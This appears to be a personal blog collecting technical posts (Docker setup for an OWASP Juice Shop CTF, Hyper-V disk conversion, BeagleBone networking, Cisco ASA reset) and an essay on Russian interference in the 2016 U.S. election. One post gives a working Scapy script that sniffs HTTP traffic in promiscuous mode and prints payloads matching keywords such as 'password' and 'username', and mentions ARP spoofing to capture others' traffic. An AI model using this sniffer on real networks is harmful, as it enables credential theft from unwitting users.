Exploring CTF platform

https://www.owasp.org/index.php/OWASP_Juice_Shop_Project

OWASP Juice Shop is probably the most modern and sophisticated insecure web application! It can be used in security trainings, awareness demos, CTFs and as a guinea pig for security tools! Juice Shop encompasses vulnerabilities from the entire OWASP Top Ten along with many other security flaws found in real-world applications! (https://www.owasp.org/)

Preparation

Base : OWASP Juice Shop Project
CTF Extension:CTFd

OS : Ubuntu 18.04 LTS Server
Installer : Docker

1.Installing Docker

$sudo apt-get update
$sudo apt install apt-transport-https ca-certificates curl software-properties-common
$curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
$sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable"
$sudo apt-get update && sudo apt-get upgrade
$apt-cache policy docker-ce
$sudo apt install docker-ce
$sudo systemctl status docker

Executing Docker with normal user

$sudo usermod -aG docker ${USER}  
$su - ${USER}
$id -nG
$sudo usermod -aG docker username

Basic Docker command

$docker ps -a
$dccker kill containerid
$docker rm containerid
$docker rmi imageid

2.Docker Compose

$sudo curl -L https://github.com/docker/compose/releases/download/1.21.2/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose
$sudo chmod +x /usr/local/bin/docker-compose
$docker-compose --version

3.OWASP Juice Shop Project

$docker pull bkimminich/juice-shop
$docker run -d -e CTF_KEY="any hash key generated" -e "NODE_ENV=ctf" -p 3000:3000 bkimminich/juice-shop

4.CTFd Installation

$cd /opt
$git clone https://github.com/CTFd/CTFd.git

Modify the docker-compose.yml file from the repository to specify a SECRET_KEY environment for the CTFd service. 
: Environment 
 - SECRET_KEY=<SPECIFY_RANDOM_VALUE>

$docker-compose up

Reference

https://www.digitalocean.com/community/tutorials/how-to-install-and-use-docker-on-ubuntu-18-04
https://www.digitalocean.com/community/tutorials/how-to-install-docker-compose-on-ubuntu-18-04
https://www.owasp.org/index.php/OWASP_Juice_Shop_Project
https://ctfd.io/
https://www.owasp.org/images/f/f6/OWASP_BeNeLux_2018_Bjoern_Kimminich_-Juice_Shop-_OWASP%27s_most_broken_Flagship.pdf
https://buildmedia.readthedocs.org/media/pdf/ctfd/latest/ctfd.pdf

Converting VMs to Hyper-V

Hyper-V provide a specific PowerShell tool for converting other VMs to Hyper-V disk(*.vhd, *.vhdx), but when converting images, it generally occurs errors depending on environment. After some trial errors, I found those errors can be categorized.

VMware to Hyper-V (*.vmdk to *.vhdx)

Download Microsoft Virtual Machine Converter 3.0 tools(mvmc) from MS
In PowerShell, import module from mvmc

PS C:\Users|Administrator>Import-Module ‘C:\Program Files\Microsoft Virtual Machine Converter\MvmcCmdlet.psd1’
PS C:\Users|Administrator>ConvertTo-MvmcVirtualHardDisk -SourceLiteralPath d:\scratch\vmx\VM-disk1.vmdk -VhdType DynamicHardDisk -VhdFormat vhdx -destination c:\vm-disk1

VirtualBox to Hyper-V (*.ova to *.vhdx)

OVA files are simply tar archive files containing the OVF directory. After renaming *ova file to *.tar, we can extract .vmdk file from *.tar.

Next step is same as vmdk

Dealing with errors

Common errors are starting with “The entry… us not a supported disk database entry fir the descriptor”

The dsfok tool helps modifying descriptor. It extracts descriptor from vmdk file then can combine them together. First take a descriptor from image file with difo.exe then inject it with dsfi.exe.

dsfo.exe "d:\folder\file.vmdk" 512 1024 descriptorname.txt
dsfi.exe "d:\folder\file.vmdk" 512 1024 descriptorname.txt

Just comment out where it generates errors.

ddb.toolsInstallType = "2" --> #ddb.toolsInstallType = "2"

References

https://live.osgeo.org/de/quickstart/hyperv_quickstart.html
https://blogs.msdn.microsoft.com/timomta/2015/06/11/how-to-convert-a-vmware-vmdk-to-hyper-v-vhd/
https://stackoverflow.com/questions/37481737/error-when-converting-vmware-virtual-disk-to-hyperv

Installing Crossbuild tools

A cross compiler is a compiler capable of creating executable code for a platform other than the one on which the compiler is running. For example, a compiler that runs on a Windows 7PC but generates code that runs on Android smartphone is a cross compiler (Wikipedia)

Dependency check on crossbuild-essential-armhf

We should install three pre-requisite packages (actually, two packages)
dpkg-cross, g++arm-linux-gnueabihf and gcc-arm-linux-gnueabihf
$sudo apt-get install dpkg-cross g++arm-linux-gnuabihf

Then, finally crossbuild-essential-armhf can be installed.
$sudo apt-get install crossbuild-essential-armhf

Simple Code Compile/Execution

Hostmachine :Ubuntu 18.04.3 LTS, Architecturer: x86-64

Hostmachine: Debian 9, Architecturer: arm

give BBB an internet access

Tried many things to make BBB connected to internet. There’re few different ways such as by enabling ethernet port or adding USB Wi-Fi dongle. But it won’t work stable when we move BBB to difference environment. Thus, I think sharing host internet is easiest way to give BBB an internet access. To make this we should route all outbound packets to this device from the BBB to the Internet via the Internet access interface.

First thing first, make USB connection between BBB and host machine.
Then check the IP address on USB port.

USB0 has 192.168.7.1 and it is a default gateway for BBB’s usb0 interface.

Host Setting

#Enabling traffic re-routing to Internet Access interface on host machine
#In this case, Internet traffic fro BBB’s USB0 enx4c3fd3c18fa6 will be routed to host’s Wi-Fi interface wlp10
$sudo sysctl net.ipv4.ip_forward=1
$sudo iptables --table nat --append POSTROUTING --out-interface wlp1s0 -j MASQUERADE
$sudo iptables --append FORWARD --in-interface enx4c3fd3c18fa6 -j ACCEPT

BBB Setting

#as a root
[email protected]:/#route add default gw 192.168.7.1
[email protected]:/#echo "nameserver 8.8.8.8" >> /etc/resolv.conf

CISCO ASA

Image retrieved from cisco.com

Open source ? or commercial product? I believe they have pros and cons respectively. PfSense is working perfect as a centralized firewall includes almost everything but need more computing power when it deals with massive network traffic. Cisco ASA series are robust and fast, but expensive. So, maybe mid-range companies or organizations might prefer to use pfSense and big companies seem to use legacy bare-bone firewalls. Anyways it would be better for us to use both side of firewalls and compare its functions together.

Factory reset

Boot up then push esc key few times
rmmon #0>confreg
select no
rmmon #1>confreg 0x41
rmmon #2>boot
ciscoasa>
ciscoasa>enable
blank password
ciscoasa#write erase
ciscoasa#configure terminal
ciscoasa(config)# config-register 0x01
ciscoasa(config)# exit
ciscoasa#show version
ciscoasa#write
ciscoasa#reload
login with blank password
ciscoasa(config)#configure factory-default

Setting up ASDM

#enable password mypassword
#show disk0: (to check asdm bin)
ciscoasa(config)#asdm image disk0:/asdm-xxx.bin
ciscoasa(config)#username sysadmin password mypassword privilege 15 ciscoasa(config)#aaa authentication http console LOCAL
ciscoasa(config)#http server enable 443

We should also install the JRE since ADSM is running on JAVA
Then add JRE path on system environment variables.

Then we can just start making initial configuration for physical ethernet ports. These are might be wan, management, dmz1 or dmz2 depending on purposes, but I would like to say we need to check consoles and GUI together to make sure that configurations are well synchronized.  We can add up Cisco routers or switches to expand or isolate traffics.

connecting BBB /w USB Oscilloscope

We used a quite fancy digital oscilloscope in reverse engineering laboratory. Outside lab, I should find better way to recover my poor learning skills. Honestly, I am not a hardware guy, thus there were always tons of trial errors whenever playing with Beagle Bone. Fortunately, now I found out how to connect USB to TTL serial cable and how to display frequency on the alternative oscilloscope.

Make stable connections with BBB

Fist thing first, we need to connect BBB to PC with regular USB cable.
There is a trick. When BBB is connected to PC, 4 blue LEDs will be blinking simultaneously. As soon as it stops blinking, make USB to TTL cable plugged into serial debug slot. First slot is GND, fourth is TX and firth is RX. Safe option is to push reset button in any unusual cases.

Base terminal application

I have been using the Screen for Raspberry Pi but Minicom is much better for BBB since it can modify some communication options like hardware flow control.

Just make same configuration on Minicom by using minicom -s option then save setup as dfl. Serial device location can be found inside dmesg.

PC based digital oscilloscope

Only thing that I needed to know it how to recap my hands-on exercises. There were bunch of USB digital oscilloscope, but I chose Hantek since it was most cost-effective product in market. If I have enough budget, I would buy the Analog Discovery 2 USB Oscilloscope. Alternatively, I believe Hantek PC Based USB Digital Storage Oscilloscope 6022BE seems to be enough for my purpose. This article was quite helpful: Top 7 PC-based USB oscilloscopes of 2017: for hobbyists, makers, and pros

snapshot

I should have followed the wise saying: “There are two types of people. Those who backup and those who have yet to lose everything to a system crash.”

I wrote some takeaways from current learning practices on this tidy little space. Website was running on VM ESXi for few months without issue; however, an error has occurred while migrating and installing the hypervisors. Thought I made full disk back up, but I did not notice that file contains some errors. So, now I am in the middle of recovering my previous records.

Anyways, it’s time to move one step further.

sniff network /w scapy

There are always chances to get someone else’s unencrypted traffic especially in local network. We might use ARP-spoof, poisoning, gateway attack whatever, but Scapy is the one of great toot to check network environment.

Pres-requisite

$sudo apt-get install python-scapy python-pip
$pip install scapy_http

Enable Promiscuous mode on network interface
$sudo ifconfig interface(eth0 whatever) promisc

It is always best to try it on bridged network. To avoid interference, testing on local host machine would be the best practice.

import scapy.all as scapy
from scapy_http import http
import argparse
def get_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--interface", dest="interface",
                        help="Interface name")
    options = parser.parse_args()
    return options
def sniff_packet(interface):
    scapy.sniff(iface=interface, store=False, prn=process_packets)
def get_url(packet):
    return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_credentials(packet):
    if packet.haslayer(scapy.Raw):
        load = packet[scapy.Raw].load
        keywords = ["login", "submission","challenge","password", "username", "user", "pass"]
        for keyword in keywords:
            if keyword in load:
                return load
def process_packets(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print("[+] Http Request >> " + url)
        credentials = get_credentials(packet)
        if credentials:
            print("[+] Someone has submitted flag, interested? " + credentials + "\n\n")
options = get_arguments()
sniff_packet(options.interface)

Russia’s Meddling in the 2016 U.S. Election

Russia’s Meddling in the 2016 U.S. Election 

Russia bluntly interfered the 2016 U.S. presidential election process. That was the unified judgement of all of three US intelligence agencies including CIA, FBI and NSA. According to their report (2017), there was a multitude of detailed disclosures and information about how Russia executed its campaign to influence the presidential election. More specifically, it was a highly orchestrated campaign directed and ordered by Vladimir Putin. Intelligence communities have stated with high confidence that the Russian government sought to influence the outcome of the 2016 U.S. presidential election favoring Donald Trump over Hillary Clinton. Russia’s motivation for meddling in presidential election was clear since Putin and his government preferred Trump for maintaining their regime (Director of National Intelligence, 2017, pp 3-4). 

Russia has been accumulated their lessons-learned from previous cyber campaigns from Estonia to Ukraine, and successfully integrated them into the 2016 U.S. election attack. First, they started online propaganda by utilizing major social network services. The Russian’s online disinformation campaigns sprawled over Facebook, Twitter and Google throughout the automated social accounts, bots and professional trolls as part of its influence efforts to tarnish Hillary Clinton and promote Donald Trump. They understood exactly how online media system works and how to influence an audience. Mayer (2018) found, Russian operators shared free and paid posts to “a hundred and twenty-six million American Facebook users” (para.18). Their audiences were analyzed and targeted to specific voters including battle ground state residents. As their work spreads, millions of Americans ended up unknowingly sharing the fake news and viewing the ads, which are illegal. Second, hackers used spear phishing attacks to penetrate the DNC (Democratic National Committee)’s computer Network, as well as emails from individuals like John Podesta, chairman of the Clinton campaign (Lipton, Sanger& Shane, 2016, para.10). According to Lipton, Sanger and Shane (2018), the hacked information was released using WikiLeaks, Guccifer 2.0 persona and the site DCLeaks.com. The intelligence communities determined that two Russian hacking groups called Fancy Bear and Cozy Bear were directly linked to Russia’s military intelligence service, the GRU. The GRU directed the cyber operations and the hacks were part of Russia’s efforts not just to undermine confidence in the election but to actively help Trump’s victory. After their successful campaign as a king maker, Putin and his government made improvement on their cost-effective “Perfect Weapon” (Lipton, Sanger& Shane, 2016, para. 16). 

Attacking the Center of Gravity by Controlling theCyberspace 

The 2016 U.S. election case demonstrated that cyberattacks have been turned to much more sophisticated. It showed that how they identified the enemy’s center of gravity and how they compromised cyberspace to achieve their goal. Russian campaign recalled classical thinkers like Sun Tzu, Clausewitz and Corbett. It is worth to know that how they combined those strategies and how emasculated the democratic political systems regardless whether it was intended or not. Russian has successfully implemented those series of cyber campaigns by controlling the cyberspace around the U.S. In order words, it is safe to say the best way to attack the center of gravity is controlling the cyberspace of enemy. 

The Center of Gravity – Psychological relationship 

In terms of cyberattacks, it has been clearly seen that Russia has attacked the enemy’s center of gravity – the strong trust between populate and its government – for successful campaign. In modern cyberwarfare, it is not enough to achieve their goal only by attacking social infrastructures such as power grid. As Clausewitz (1984)’s favorite definition about war, attacker’s long-term object is achieving their political needs (Book 1, Chapter 1, 24 “War is merely the continuation of policy by other means”, para. 1). In order for achieving their sophisticated object, enough preparation must take precedence. Without knowing enemy, campaigns easily lead unintended results such as reunification or strengthening the relationship between populace and government. It also causes backfire such as sanctions or counterattacks against the attacker. Thus, campaign is required to be well prepared throughout the massive but accurate enumerations about the target. It must be escalated with serious of collateral damage on trust in between government and its populace. As Sun Tzu (1994)’s immutable truism about preparation, it is a key strategy of not being “endangered in a hundred engagements” (“Planning offensive”, para. 10). The center of gravity for successful campaign was clear for Russia. As intelligence communities have clearly mentioned, Russia’s cyberattacks aimed to “undermine public faith in the US democratic process” (Director of National Intelligence, 2017, pp 7). They compromised American voters and made gaps between populace and their government, media and politics, political parties, and between government and U.S. national security organizations.  

Attacker’s advantage  

In conventional warfare in history, there has been advantageous for the defending side. Sun Tzu (1994) asserted that “whoever occupies the battleground first and awaits the enemy will be at ease” (“Vacuity and Substance”, para.1). Clausewitz (1989) argued, “defense is easier than attack” on warfare since “it is easier to hold ground than take it”(Book 6, Chapter 1, “Advantages of defence”, para.1) and Corbett (1911) also believed that defensive strategy is more favorable than offensive strategy saying that “active defensive operations” are important “to prevent the enemy achieving any positive result” in sea battle (Chapter 3, “Defensive Fleet Operation – A Fleet in Being”, para 3). However, not the same as those military thinkers, attackers have the upper hand in cyber battle field. It is because cyberwarfare is a vastly different world from physical spaces. First, there are no physical barriers and overt weapons. As information is highly centralized and human is connected online all the time, there exists big chances to find bits of serendipity for attacker. For instance, Russia’s reach online was unprecedented and sophisticated. However, they also used old school tactic such as phishing email. John Podesta was one of victims and was being a high valued asset for Russia. Second, there exists imbalanced information between attackers and defenders. Hackers enumerated and gathered information about their target long-term perspective then activated their campaigns simultaneously. These unknown and covert attacks keep target on the defensive. Because, even small success in their attacks can cause massive chaos in the target system. 

Command of the Bits 

As seen the attribute of cyberspace, it is neither unpredictable nor uncontrollable as Corbett’s maritime strategy. Cyberspace is not a battle field, but rather it is a space to be controlled for winning war. No country can win a war only by utilizing physical weapons in modern war. Russia chosen cyberspace as their strategical battle field. Cyberspace was the perfect weapon for Russia because it is “a low-cost, high-impact weapon that Russia had test-fired in elections from Ukraine to Europe” (Lipton et al., 2016, para. 16). For Russia, “with an enfeebled economy and a nuclear arsenal it cannot use short of all-out war, cyberpower proved the perfect weapon: cheap, hard to see coming, hard to trace” (Lipton et al., 2016, para. 16). Putin and his government directly targeted to the U.S. center of gravity – the strong trust between populace and its government – by controlling the cyberspace. They investigated, planned and presented their series of multiple campaigns. As Corbett (1911) argued “the object of naval warfare is the control of communications” (Chapter 1, “Theory of the Object – Command of the Sea”, para. 11), Russian hackers paralyzed U.S. media outlets by reframing and setting the political agenda throughout leaking email and generating disinformation. As Mayer (2018) reported, they exploited stolen emails from Podesta’s account to fade Trump’s “Access Hollywood” (para. 30) scandal. These activities operated by Russian advertisements and social media bots did far more damage than any of the compromised servers. 

Russian-backed hackers maximize the benefit of cyberspace for their successful campaign. It is easy to hide and easy to make their actions undiscovered. In cyberspace, it is impossible to distinguish friends and enemies. Hackers were being innocent American voters who support freedom of speech. Cyberspace also allowed attackers operational flexibilities. They dynamically reflected and changed their operations depending on what they discovered and how the U.S. reflected against their attacks. As Obama Administration escalated the investigation regarding the Russian hacking, Russian provided hacked emails from Hillary Clinton to the WikiLeaks and started slowly leaking them to public (Mayer, 2018, para. 29). It was being a smoking gun for Hillary and a blackhole to absorb their risks.  

Leaked weaknesses 

As their cyber attacks continued, the U.S. democracy systems leaked lots of weaknesses. Politicians utilized the foreign government’s cyber attacks as their chances to regain the political position and media outlets reproduced gossips and fake news. Even Donald Trump “gleefully cited many of the purloined emails on the campaign trail” (Lipton et al., 2016, para.12). As soon as Hillary’s emails have been hacked, massive fake news were generated by Russian-backed media and directly delivered to public. It did not matter whether that news was fact or not. Even general US voters did not have media literacy since they are always overwhelmed by information overload. Russia’s case also reminds the importance of acknowledging of personal cyber security guidance. Even highly secured government facilities, a single inconsiderate action such as clicking the email intended by hacker can paralyzed the entire security system. Cyber security is not a technical matter, rather it is a process. Hackers successfully compromised its process. 

Conclusion 

For Clausewitz, war was “the realm of uncertainty” and “wrapped in a fog” (Book 1, Chapter 3 – “On Military Genius”, para. 10). It is being more unpredictable in modern war. Attackers get a vote in cyberspace. They are waging war and taking leverage by controlling the cyberspace. There is no doubt of Russian’s meddling in other nations political system is going to happen unless fixing the leaked issues during the Russia’s cyber campaign in 2016 U.S. presidential election. Political systems were easily paralyzed and divided by toxic atmosphere. Populace were personalized, and the function of media outlets did not work properly. Even intelligence communities were failed to react immediately. Most nations in the word today are facing an unprecedented challenge in defending themselves against this psychological cyber warfare. Attackers method has been growing more sophisticated. There is not a clear prescription; however, it is clear that defending strategies also need to be sophisticated but well orchestrated. 

References

Clausewitz, C. ., Howard, M., Paret, P., & Brodie, B. (1984). On war. Princeton, N.J: Princeton University Press. 

Corbett, J. (1911). Principles of maritime strategy. London: Longmans.

Director of National Intelligence, United States. (2017). Background to “assessing Russian activities and intentions in recent US elections”: The analytic process and cyber incident attribution. https://www.intelligence.senate.gov/sites/default/files/documents/ICA_2017_01.pdf 

Lipton, E. Sanger, D. & Shane, S. (December 13, 2016). The perfect weapon: How Russian cyberpower invaded the US. The New York Times. https://www.nytimes.com/2016/12/13/us/politics/russia-hack-election-dnc.html 

Mayer, J. (September 24, 2018). How Russia helped swing the election for Trump. The New Yorker. https://www.newyorker.com/magazine/2018/10/01/how-russia-helped-to-swing-theelection-for-trump 

Sun Tzu (1994). The art of war. (R. Sawyer, Trans.). Boulder, CO: Westview Press.